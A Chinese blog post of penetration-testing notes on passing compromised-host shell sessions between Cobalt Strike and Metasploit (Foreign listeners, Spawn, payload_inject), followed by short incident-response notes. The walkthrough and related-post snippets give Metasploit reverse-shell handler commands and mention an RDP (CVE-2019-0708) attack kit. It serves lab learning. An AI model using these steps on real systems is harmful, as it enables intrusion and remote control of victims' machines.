内网安全-域横向CS&MSF联动及应急响应初识

已于 2022-03-25 09:12:58 修改
阅读量4k 收藏 2
点赞数
分类专栏: 渗透笔记2 文章标签: 安全
于 2022-03-25 09:02:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/123677111
版权

在这里插入图片描述
在这里插入图片描述

案例1:MSF&CobaltStrike联动Shell

CS->MSF
创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器
MSF->CS
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线
use exploit/windows/local/payload_inject

首先准备一台外网的服务器,安装上cs和msf

将cs会话反弹到msf上

本地连接cs,目标cs上线后,创建监听
在这里插入图片描述
msf处创建监听模块
设置payload时,需要与cs处协议保持一致
在这里插入图片描述
设置参数
端口处要与cs设置的端口一致
在这里插入图片描述
想反弹哪个上线的主机的shell,就选择它右键Spawn
在这里插入图片描述
绑定刚才创建的监听器
在这里插入图片描述
msf这边收到反弹的shell
在这里插入图片描述
将msf上会话反弹到cs上

首先cs处创建监听器,设置msf的ip以及端口
在这里插入图片描述

msf获取到shell会话后
先background退出会话,查看当前的sessions会话
在这里插入图片描述
进入模块exploit/windows/local/payload_inject,查看需要设置的参数
在这里插入图片描述
设置payload,这里的payload需要与cs处监听器设置的协议保持一致
在这里插入图片描述

show options查看并设置参数
设置端口,与cs处保持一致
设置lhost为cs服务器的ip地址
载入对应的session会话
在这里插入图片描述

执行
在这里插入图片描述

cs这里已经上线了,成功将msf中session 4的shell会话反弹到cs上
在这里插入图片描述

应急响应

在这里插入图片描述

案例2-WEB攻击应急响应朔源-后门,日志

回顾:某客户反应自己的网站首页出现被篡改,请求支援

分析:涉及的攻击面涉及的操作权限涉及的攻击意图涉及的攻击方式等

思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
思路2:利用后门Webshe11查杀脚本或工具找到对应后门文件,定位第一次时间分析

案例3-WIN系统攻击应急响应朔源-后门,日志,流量

分析:涉及的攻击面涉及的操作权限涉及的攻击意图涉及的攻击方式等

故事回顾:某客户反应服务器异常出现卡顿等情况,请求支援

思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量
获取进行监控:PCHunter64
获取执行列表:UserAssistview 
AppCompatCacheParser.exe --csv c:\temp -t

windows系统可以用PCHunter64工具查看,蓝色字体运行的进程都不是系统进程
在这里插入图片描述

深白色耳机
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2439
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的csmsf互相反弹shell。Linux系统被控主机的反弹shell给cscs上的Linux主机反弹shell给msf
CS联动MSF
m0_72125469的博客
05-27 575
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动
记一次监测到CS流量的应急响应
maxiluo的博客
05-07 448
据消息得知,某事业单位一网通系统收到网信办通报,监测到Cobalt Strike HTTp Beacon心跳/拉取命令动作,我方接到通知立刻展开应急处置。经过以上排查可知,服务器于****年*月**日之前受到攻击,被上传相关的CS木马,对数据库进行排查,未见保留的大规模数据数据泄漏记录,现已经可疑程序清除,不排除攻击者有其他权限维持的手段,结合上述异常状态,建议对服务器下线进行全面排查,必要情况下对服务器进行重做。
第72天-内网安全-横向 CS&MSF 联动应急响应
MCTSOG的博客
04-27 2729
思维导图 内网渗透 待续 应急响应 演示案例: MSF&CobaltStrike 联动 Shell (待续) 应急响应 攻击者可能拿到了哪些权限,攻击可能发生在哪个部分,从最可能的开始排查 可疑文件看文件有没有毒,有没有外部链接 结合攻击指搭建平台的漏洞 WEB 攻击应急响应朔源-后门,日志 故事回顾:某客户反应自己的网站首页出现篡改,请求支援 分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析 思路2
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 350
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
内网-横向CS&MSF联动应急响应初识
mingyqf的博客
11-24 950
内网-横向CS&MSF联动应急响应初识 本课重点: 案例1:MSF&CobaltStrike联动Shell 案例2:WEB攻击应急响应朔源-后门,日志 案例3:WIN系统攻击应急响应朔源-后门,日志,流量 案例1:MSF&CobaltStrike联动Shell 为什么要进行联动?因为csmsf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在csmsf、powershell之间进行会话委派。powersh
第一章 声现象考点及知识点.
07-27
综上所述,声音的产生、传播及声速是声现象的核心知识点。理解和掌握这些概念对于解答相关物理问题至关重要。同时,实验探究是验证理论的重要方法,聂利同学的研究就是一个很好的实例,展示了科学探究的过程和逻辑。
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
【技术分享】恶意框架样本分析-从Veil到Msf .pdf
09-05
此外,企业应建立应急响应机制,以便在发现攻击时能够快速响应和恢复。 总的来说,从Veil到Msf的过渡揭示了渗透测试工具的多样性和复杂性。了解和掌握这些框架不仅可以帮助安全专家模拟攻击,还能提升他们的防御...
74-74.渗透测试-MSF核心模块.mp4
最新发布
05-10
74-74.渗透测试-MSF核心模块.mp4
73-73.渗透测试-MSF目录结构.mp4
05-10
73-73.渗透测试-MSF目录结构.mp4
2021-06-30csmsf联动派生会话shell
qq_45290991的博客
06-30 634
一、当cs获取到会话后反弹msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
msfcs互传,msfcs建立frp穿透
qq_42430287的博客
04-13 1896
msfcs互传,msfcs建立frp穿透
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3614
横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
内网渗透中metasploit与cs之间的会话转交
qq_53829555的博客
09-12 596
内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了这里监听机为kali2021.4版,靶机为win10
p72 内网安全-横向 CS&MSF 联动应急响应初识
weixin_43263566的博客
05-08 674
内网安全-横向 CS&MSF 联动应急响应初识
msfcs互传shell
good good study
04-19 2665
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
第二周渗透测试靶场实践
张子悦^^的博客
10-12 366
第二周渗透测试靶场实践信息收集扫描端口漏洞利用phpMyadminyxcms后渗透内信息收集反弹shell提权利用csmsf联动设置代理cs的准备工作系统信息收集主机密码收集cs读内存cs读注册表密码利用cs设置代理msf配置代理添加路由msf扫描内网主机内网信息收集获取内网主机权限窃取Token总结 信息收集 扫描端口 靶场地址:10.203.87.175 nmap -sS -sV -A 10.203.87.175 开了80端口,浏览器打开 发现备份文件,点击备份文件,解压 打开每
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN前置
11-16
CSMSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,可以用于验证数字证书的真实性。常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值